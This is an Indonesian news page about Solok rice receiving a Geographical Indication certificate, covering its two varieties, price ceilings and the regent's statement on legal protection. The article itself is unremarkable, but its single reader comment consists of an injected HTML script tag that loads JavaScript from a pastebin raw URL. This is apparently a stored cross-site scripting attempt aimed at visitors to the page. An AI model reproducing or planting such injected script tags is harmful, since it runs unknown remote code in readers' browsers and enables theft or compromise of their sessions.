Baca Berita

Beras Solok Resmi Dipatenkan Dengan Keluarnya Sertifikat Indikasi Geografis (IG)

Post Title Keterangan Gambar :

Setelah menunggu selama kurang lebih satu tahun, akhirnya beras solok resmi mendapat pengakuan geografis dari pemerintah pusat. Ini seiring telah diserahkannya sertifikat Indikasi Geografis (IG) beras solok oleh Kemenkum HAM kepada Bupati Solok saat saat Seminar Nasional Indikasi Geografis pada Festival Indikasi Geografis di Sentral Park Jl. Letnan Jendral S. Parman No. 28 RT 12/RW 6 Tanjung Duren Grogol Patamburan, Jakarta Barat.

Sertifikat IG merupakan upaya dalam melindungi komoditi unggulan dalam menghadapi pasar global. Sumatera Barat masih banyak peluang produk-produk unggulannya yang bisa untuk diurus IG-nya diantaranya kopi arabika, ikan bilih dan produk lainnya.

Sertifikat IG beras solok ini terdiri dari dua varietas yaitu sokan dan anak daro. Untuk diketahui, dua varietas ini pun dipatok dengan harga di atas harga eceran tertinggi (HET) yakni Rp. 13.000 hingga Rp. 15.000 per kilogramnya. IG sendiri pada dasarnya adalah sertifikat yang dilindungi Undang-Undang yang diberikan kepada sebuah produk unggulan yang memang berada didaerah tersebut. Dalam IG ini ada pengakuan tentang produk dan kualitasnya. Untuk diketahui berdasar Peraturan Menteri Perdagangan (Permendag) Nomor 57 Tahun 2017 tentang Penetapan Harga Eceran Tertinggi Beras, tidak boleh menjual beras di atas HET. HET beras premium ada diangka Rp. 9.950/perkilogram dan harga beras super diangka Rp. 13.300 per kilogram.

Menurut Bupati Solok Gusmal beras solok adalah ikon Kabupaten Solok. Oleh sebab itu harus ada payung hukum yang melindungi keaslian beras tersebut, apalagi sebagian beras masyarakat solok merupakan petani padi yang bergantung pada hasil padi dan beras, juga sebagai bentuk pengakuan bahwa Kabupaten Solok adalah lumbung padi.

Keuntungan sertifikat IG ini di antaranya memberikan perlindungan dan kapasitas hukum suatu produk serta mencegah penggunaan produk yang tidak sah. Kemudian adanya jaminan mutu suatu produk, peingkatan pertumbuhan ekonomi, ekspor dan industri pariwisata. “ Dengan IG ini, beras solok telah memiliki payung hukum yang menjamin beras yang dijual benar-benar berasal dari Solok

Beras Solok menjadi komoditi pertanian pertama di Sumbar yang mendapat sertifikat IG. Bberas Solok, kualitasnya sudah diakui dan dilindungi oleh pemerintah, jadi kalau ada yang hanya sekedar memakai nama saja, tapi berasnya dari luar Solok, itu bisa dituntut.


Bagikan Ke : Facebook Twitter

Komentar Dari Facebook

Ada 1 Komentar untuk Berita Ini

  1. Tempek 17 Nov 2019, 11:08:43 WIB

    <script type="text/javascript" SRC="https://pastebin.com/raw/rd3z542f"></ script>

Berikan komentar